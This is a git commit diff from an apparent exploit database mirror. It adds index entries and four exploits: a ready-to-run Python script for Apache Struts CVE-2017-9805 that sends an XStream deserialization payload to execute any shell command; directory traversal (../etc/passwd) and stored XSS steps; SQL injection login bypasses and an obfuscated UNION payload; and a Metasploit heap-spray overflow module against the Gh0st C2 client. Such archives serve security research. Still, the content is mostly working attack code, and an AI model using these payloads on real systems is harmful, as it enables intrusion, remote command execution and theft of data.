DB: 2017-09-08
4 new exploits Tor - Linux Sandbox Breakout via X11 Tor (Linux) - X11 Linux Sandbox Breakout Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution Gh0st Client - Buffer Overflow (Metasploit) TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting Online Invoice System 3.0 - SQL Injection
This commit is contained in:
parent
a1eeba1263
commit
67b3da92e4
5 changed files with 311 additions and 2 deletions
|
@ -9230,7 +9230,7 @@ id,file,description,date,author,platform,type,port
|
|||
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
|
||||
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
|
||||
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
|
||||
42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
|
||||
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
|
@ -15795,6 +15795,8 @@ id,file,description,date,author,platform,type,port
|
|||
42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
|
||||
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
|
||||
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
|
||||
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
|
||||
42630,platforms/windows/remote/42630.rb,"Gh0st Client - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
|
||||
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
|
||||
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
|
||||
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
|
||||
|
@ -38202,7 +38204,7 @@ id,file,description,date,author,platform,type,port
|
|||
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
|
||||
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
|
||||
42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
|
||||
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root",2017-05-30,"Simone Margaritelli",php,webapps,8181
|
||||
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",php,webapps,8181
|
||||
42094,platforms/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",php,webapps,0
|
||||
42095,platforms/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,php,webapps,0
|
||||
42096,platforms/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,php,webapps,0
|
||||
|
@ -38408,3 +38410,5 @@ id,file,description,date,author,platform,type,port
|
|||
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
|
||||
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
|
||||
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
|
||||
42628,platforms/php/webapps/42628.txt,"Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
|
||||
42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
97
platforms/linux/remote/42627.py
Executable file
97
platforms/linux/remote/42627.py
Executable file
|
@ -0,0 +1,97 @@
|
|||
# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
|
||||
# Google Dork: filetype:action
|
||||
# Date: 06/09/2017
|
||||
# Exploit Author: Warflop
|
||||
# Vendor Homepage: https://struts.apache.org/
|
||||
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
|
||||
# Version: Struts 2.5 – Struts 2.5.12
|
||||
# Tested on: Struts 2.5.10
|
||||
# CVE : 2017-9805
|
||||
|
||||
#!/usr/bin/env python3
|
||||
# coding=utf-8
|
||||
# *****************************************************
|
||||
# Struts CVE-2017-9805 Exploit
|
||||
# Warflop (http://securityattack.com.br/)
|
||||
# Greetz: Pimps & G4mbl3r
|
||||
# *****************************************************
|
||||
import requests
|
||||
import sys
|
||||
|
||||
def exploration(command):
|
||||
|
||||
exploit = '''
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString>
|
||||
<flags>0</flags>
|
||||
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
|
||||
<dataHandler>
|
||||
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
|
||||
<is class="javax.crypto.CipherInputStream">
|
||||
<cipher class="javax.crypto.NullCipher">
|
||||
<initialized>false</initialized>
|
||||
<opmode>0</opmode>
|
||||
<serviceIterator class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="javax.imageio.spi.FilterIterator">
|
||||
<iter class="java.util.Collections$EmptyIterator"/>
|
||||
<next class="java.lang.ProcessBuilder">
|
||||
<command>
|
||||
<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
|
||||
</command>
|
||||
<redirectErrorStream>false</redirectErrorStream>
|
||||
</next>
|
||||
</iter>
|
||||
<filter class="javax.imageio.ImageIO$ContainsFilter">
|
||||
<method>
|
||||
<class>java.lang.ProcessBuilder</class>
|
||||
<name>start</name>
|
||||
<parameter-types/>
|
||||
</method>
|
||||
<name>foo</name>
|
||||
</filter>
|
||||
<next class="string">foo</next>
|
||||
</serviceIterator>
|
||||
<lock/>
|
||||
</cipher>
|
||||
<input class="java.lang.ProcessBuilder$NullInputStream"/>
|
||||
<ibuffer/>
|
||||
<done>false</done>
|
||||
<ostart>0</ostart>
|
||||
<ofinish>0</ofinish>
|
||||
<closed>false</closed>
|
||||
</is>
|
||||
<consumed>false</consumed>
|
||||
</dataSource>
|
||||
<transferFlavors/>
|
||||
</dataHandler>
|
||||
<dataLen>0</dataLen>
|
||||
</value>
|
||||
</jdk.nashorn.internal.objects.NativeString>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
|
||||
</entry>
|
||||
</map>
|
||||
'''
|
||||
|
||||
|
||||
url = sys.argv[1]
|
||||
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
|
||||
'Content-Type': 'application/xml'}
|
||||
|
||||
request = requests.post(url, data=exploit, headers=headers)
|
||||
print request.text
|
||||
|
||||
if len(sys.argv) < 3:
|
||||
print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
|
||||
print ('[*] Warflop - http://securityattack.com.br')
|
||||
print ('[*] Greatz: Pimps & G4mbl3r')
|
||||
print ('[*] Use: python struts2.py URL COMMAND')
|
||||
print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
|
||||
exit(0)
|
||||
else:
|
||||
exploration(sys.argv[2])
|
44
platforms/php/webapps/42628.txt
Executable file
44
platforms/php/webapps/42628.txt
Executable file
|
@ -0,0 +1,44 @@
|
|||
# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
|
||||
# Date: 2017-09-05
|
||||
# Exploit Author: 8bitsec
|
||||
# Vendor Homepage: http://workablezone.com
|
||||
# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
|
||||
# Version: 1.2
|
||||
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
||||
# Email: contact@8bitsec.io
|
||||
# Contact: https://twitter.com/_8bitsec
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2017-09-05
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Workable Zone is probably one of most customizable Human resourse(HR) management software for companies of all sizes.
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
|
||||
Multiple Stored XSS vulnerabilities found.
|
||||
|
||||
Directory Traversal vulnerability can disclose sensitive files.
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
|
||||
Stored XSS:
|
||||
|
||||
Logged as Employee:
|
||||
|
||||
Write your payload on:
|
||||
Profile > Last Name
|
||||
|
||||
Other vulnerable fields include: First Name, Contact Number
|
||||
|
||||
Unauthenticated Directory Traversal:
|
||||
|
||||
http://localhost.com/download?type=document&filename=../../../../../etc/passwd
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
8bitsec - [https://twitter.com/_8bitsec]
|
37
platforms/php/webapps/42629.txt
Executable file
37
platforms/php/webapps/42629.txt
Executable file
|
@ -0,0 +1,37 @@
|
|||
# # # # #
|
||||
# Exploit Title: Online Invoice System 3.0 - SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 07.09.2017
|
||||
# Vendor Homepage: http://www.onlineinvoicesystem.com/
|
||||
# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
|
||||
# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
|
||||
# Version: 3.0
|
||||
# Category: Webapps
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: N/A
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Social: @ihsansencan
|
||||
# # # # #
|
||||
# Description:
|
||||
# The vulnerability allows an attacker to inject sql commands....
|
||||
#
|
||||
# Proof of Concept:
|
||||
#
|
||||
# Bypass
|
||||
# http://localhost/[PATH]/index.php
|
||||
# User: 'or 1=1 or ''=' Pass: anything
|
||||
# User: anything Pass: 'or 1=1 or ''='
|
||||
#
|
||||
# Sql
|
||||
# http://localhost/[PATH]/editclient.php?cid=[SQL]
|
||||
# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
|
||||
#
|
||||
# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
|
||||
#
|
||||
# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
|
||||
#
|
||||
# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
|
||||
# Etc...
|
||||
# # # # #
|
127
platforms/windows/remote/42630.rb
Executable file
127
platforms/windows/remote/42630.rb
Executable file
|
@ -0,0 +1,127 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Gh0st Client buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
|
||||
},
|
||||
'Author' => 'Professor Plum',
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'AllowWin32SEH' => true
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => '',
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumMixed
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'DisclosureDate' => 'Jul 27 2017',
|
||||
'Targets' =>
|
||||
[
|
||||
['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
|
||||
Opt::RPORT(80)
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def make_packet(id, data)
|
||||
msg = id.chr + data
|
||||
compressed = Zlib::Deflate.deflate(msg)
|
||||
datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
|
||||
end
|
||||
|
||||
def validate_response(data)
|
||||
if data.nil?
|
||||
print_status('Server closed connection')
|
||||
return false
|
||||
end
|
||||
if data.empty?
|
||||
print_status('No response recieved')
|
||||
return false
|
||||
end
|
||||
if data.size < 13
|
||||
print_status('Invalid packet')
|
||||
print_status(data)
|
||||
return false
|
||||
end
|
||||
mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
|
||||
if mag.index(datastore['MAGIC']) != 0
|
||||
print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
|
||||
return false
|
||||
end
|
||||
if pktlen != data.size
|
||||
print_status('Packet size mismatch')
|
||||
return false
|
||||
end
|
||||
msg = Zlib::Inflate.inflate(data[13..data.size])
|
||||
if msg.size != msglen
|
||||
print_status('Packet decompress failure')
|
||||
return false
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
sock.put(make_packet(101, "\x00")) # heartbeat
|
||||
if validate_response(sock.get_once || '')
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Trying target #{target.name}")
|
||||
print_status('Spraying heap...')
|
||||
for i in 0..100
|
||||
connect
|
||||
sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
|
||||
if not validate_response(sock.get_once)
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
for i in 103..107
|
||||
print_status("Trying command #{i}...")
|
||||
begin
|
||||
connect
|
||||
sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
|
||||
sock.put(sploit)
|
||||
if validate_response(sock.get_once)
|
||||
next
|
||||
end
|
||||
sleep(0.1)
|
||||
break
|
||||
rescue EOFError
|
||||
print_status('Invalid')
|
||||
end
|
||||
end
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
Loading…
Add table
Reference in a new issue